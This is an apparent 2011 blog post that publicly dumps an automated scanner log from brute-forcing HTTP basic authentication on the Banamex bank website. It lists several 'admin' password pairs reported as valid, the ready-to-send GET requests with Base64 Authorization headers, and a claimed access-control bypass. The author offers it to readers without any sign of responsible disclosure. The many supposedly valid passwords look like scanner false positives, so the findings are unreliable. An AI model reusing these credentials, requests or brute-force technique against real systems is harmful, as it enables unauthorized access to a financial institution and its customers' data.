Monday, May 16, 2011

Vulnerability in Banamex

Greetings, Free World.

I started playing around for a while and found this; I'll leave it here for you:

[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.collectCookies
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.error500
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 16 May 2011 11:22:10 AM CDT] Auto-enabling plugin: grep.getMails
[Mon 16 May 2011 11:22:11 AM CDT] Auto-enabling plugin: grep.lang
[Mon 16 May 2011 11:22:11 AM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 1108.
[Mon 16 May 2011 11:22:12 AM CDT] The page language is: en
[Mon 16 May 2011 11:22:12 AM CDT] The resource: "http://www.banamex.com.mx/" requires authentication. The realm is: "Basic realm="="". This information was found in the request with id 1113.
[Mon 16 May 2011 11:22:19 AM CDT] Starting formAuthBrute plugin execution.
[Mon 16 May 2011 11:22:19 AM CDT] Starting basicAuthBrute plugin execution.
[Mon 16 May 2011 11:22:19 AM CDT] Starting basic authentication bruteforce on URL: "http://www.banamex.com.mx/".
[Mon 16 May 2011 11:22:19 AM CDT] No password profiling information collected, please try to enable webSpider plugin and try again.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 1160.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 1161.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 1162.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 1163.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 1164.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 1165.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 1166.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 1167.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 1168.
[Mon 16 May 2011 11:22:20 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 1169.
[Mon 16 May 2011 11:22:22 AM CDT] Starting formAuthBrute plugin execution.
[Mon 16 May 2011 11:22:22 AM CDT] Starting basicAuthBrute plugin execution.
[Mon 16 May 2011 11:22:22 AM CDT] Found 2 URLs and 2 different points of injection.
[Mon 16 May 2011 11:22:22 AM CDT] The list of URLs is:
[Mon 16 May 2011 11:22:22 AM CDT] - http://www.banamex.com.mx
[Mon 16 May 2011 11:22:22 AM CDT] - http://www.banamex.com.mx/
[Mon 16 May 2011 11:22:22 AM CDT] The list of fuzzable requests is:
[Mon 16 May 2011 11:22:22 AM CDT] - http://www.banamex.com.mx | Method: GET
[Mon 16 May 2011 11:22:22 AM CDT] - http://www.banamex.com.mx/ | Method: GET
[Mon 16 May 2011 11:22:23 AM CDT] The resource: "http://www.banamex.com.mx/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.
[Mon 16 May 2011 11:22:23 AM CDT] Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 1160.
[Mon 16 May 2011 11:22:23 AM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 1108.
[Mon 16 May 2011 11:22:23 AM CDT] The URL "http://www.banamex.com.mx/" has the following allowed methods: GET, HEAD, POST.

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 1160.

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46MTIzYWJj
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0;

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 1161

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46cXdlcnR5
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 1162.

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46YWJjZGU=
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 1163.

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46cGE1NQ==
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 1164.

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46cWF6d3N4
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 1165.

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46ZHJhZ29u
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 1166

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46NzNtcDEyMw==
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 1168.

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 1167.

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46N2VtcA==
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0

Found authentication credentials to: "http://www.banamex.com.mx/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 1169.

GET http://www.banamex.com.mx/ HTTP/1.1
Authorization: Basic YWRtaW46bm9wYXNzd29yZA==
Host: www.banamex.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.

htaccessMethods:

auth: Misconfigured access control: The resource: "http://www.banamex.com.mx/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.

I'll leave it here for you.

Greetings, Free World.